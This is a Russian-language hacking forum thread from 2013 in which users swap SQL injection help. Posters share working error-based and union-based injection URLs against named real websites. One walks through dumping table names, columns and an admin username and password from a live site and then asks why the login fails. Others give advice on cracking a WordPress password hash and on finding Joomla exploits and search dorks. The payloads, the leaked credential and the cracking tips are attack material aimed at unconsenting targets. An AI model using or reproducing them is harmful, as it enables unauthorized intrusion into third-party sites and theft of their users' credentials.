Старый 13.02.2013, 17:33   #2701
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от durito Посмотреть сообщение
Итак имеем error based:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1/*
Duplicate entry '4.1.14-standard1' for key 1

Знаем таблицу и поля:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select concat_ws(0x3a,id,uname,0x3a) from members),floor(rand(0)*2)) having min(0) or 1/*
но получаем стандартный вывод поисковика, без сообщения об ошибке

если убрать limit то соответственно: Subquery returns more than 1 row

куды копать?
you can use substring() and group_concat() and bypass this error,like
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select substring(group_concat(id,uname),1,150) from members+limit+1,1),floor(rand(0)*2)) having min(0) or 1/*
then 30,15
60,150
90,150 etc.
spari вне форума   Ответить с цитированием
Старый 13.02.2013, 23:39   #2702
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Помогите раскрутить SQL:
Код:
http://www.gorobzor.ru/calend/view?date=2013-02-23'
У самого никак не получается вывести в ошибку, буду очень благодарен за помощь.
netcat вне форума   Ответить с цитированием
Старый 13.02.2013, 23:54   #2703
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Код:
http://www.gorobzor.ru/calend/view?date=2013-02-23'or(select(1)from(select+count(0),concat((select(concat_ws(0x3b,version(),user()))),floor(rand(0)*2))from(information_schema.tables)+group+by+2)a)or'
Цитата:
У самого никак не получается вывести в ошибку, буду очень благодарен за помощь.
а может четать и четать и четать и вникать?
Pashkela вне форума   Ответить с цитированием
Старый 14.02.2013, 07:33   #2704
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
you can use substring() and group_concat() and bypass this error,like
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select substring(group_concat(id,uname),1,150) from members+limit+1,1),floor(rand(0)*2)) having min(0) or 1/*
then 30,15
60,150
90,150 etc.
без разницы какие значение подставлять, сообщение об ошибке все равно не выводит
durito вне форума   Ответить с цитированием
Старый 14.02.2013, 23:01   #2705
dx0day
 
Регистрация: 25.10.2012
Сообщений: 5
Репутация: -2
По умолчанию

Помогите по SQL inj
Имеется уязвимость
1) Подобрал количество
http://www.2mpz.ru/cat.php?id=-62+union+select+1,2,3,4,5,6,7--

2) http://www.2mpz.ru/cat.php?id=-62+union+select+1,2,3,4,5,group_concat(table_name) ,7+from+information_schema.tables--
Вывожу таблицы, нахожу вроде бы нужную sys_umusers

3) Узнаю колонки
http://www.2mpz.ru/cat.php?id=-62+union+select+1,2,3,4,5,group_concat(column_name ),7+from+information_schema.columns+where+table_na me=CHAR(115,121,115,95,117,109,117,115,101,114,115 )--
Вот они вроде users_name,users_password

4) http://www.2mpz.ru/cat.php?id=-62+union+select+1,2,3,4,5,concat_ws(0x3a,users_nam e,users_password),7+from+sys_umusers--
Вывожу данные

admin:6qqDb6To

5) Ищу админку, http://www.2mpz.ru/admin/
Но когда ввожу полученные данные, пишет пошел вот!
В чем может быть дело?
p.s Уже очень долго разбираюсь с инъекциями и составлению дорков но никак не могу получить хоть каких ни буть результатов
Если есть добрый человек готовый помочь в этом нелёгком деле отпишите в ЛС или icq 693419518, буду очень благодарен! Спасибо
dx0day вне форума   Ответить с цитированием
Старый 15.02.2013, 00:02   #2706
dx0day
 
Регистрация: 25.10.2012
Сообщений: 5
Репутация: -2
По умолчанию

Еще имеется вопрос по алгоритму шифрования в WordPress
Нашел вот такой хэш $P$Bp2bU3fsKJ50mxp2h3q8HTULKaRppH/
Онлайн сервисы отказываются расшифровывать ссылаясь на некорректность хэша
Как быть? Забить?
dx0day вне форума   Ответить с цитированием
Старый 15.02.2013, 01:05   #2707
dx0day
 
Регистрация: 25.10.2012
Сообщений: 5
Репутация: -2
По умолчанию

Еще вопрос, как и где искать наиболее актуальные уязвимости под joomla? или как составлять дорки по joomla?
dx0day вне форума   Ответить с цитированием
Старый 15.02.2013, 01:29   #2708
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Цитата:
Но когда ввожу полученные данные, пишет пошел вот!
В чем может быть дело?
Почему ты уверен что пароль в открытом виде? А может там еще фильтр по ip стоит?

Цитата:
Онлайн сервисы отказываются расшифровывать ссылаясь на некорректность хэша
cmd5.ru принимает хеши WordPress на расшифровку

Цитата:
Еще вопрос, как и где искать наиболее актуальные уязвимости под joomla?
exploit-db.com

Цитата:
или как составлять дорки по joomla?
почитай вообще про дорки и найди особенности движка
profexer вне форума   Ответить с цитированием
Старый 15.02.2013, 01:35   #2709
valentseo
 
Регистрация: 22.04.2011
Сообщений: 1
Репутация: 0
По умолчанию как раскрутить?

Направте в правильное русло мои мысли на счет таких вот инекций:
хttр://www.mirigospel.org:80/chinese/index.php?option=com_picaweb&Itemid=on&unit=album& act=show&albumid=5352543666715915665' AND 4820=4820 AND 'SbyT'='SbyT
спасибо!
valentseo вне форума   Ответить с цитированием
Старый 15.02.2013, 11:40   #2710
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Цитата:
Сообщение от valentseo Посмотреть сообщение
Направте в правильное русло мои мысли на счет таких вот инекций:
хttр://www.mirigospel.org:80/chinese/index.php?option=com_picaweb&Itemid=on&unit=album& act=show&albumid=5352543666715915665' AND 4820=4820 AND 'SbyT'='SbyT
спасибо!
Даю направление -> https://rdot.org/forum/showpost.php?p=746&postcount=3
cat1vo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot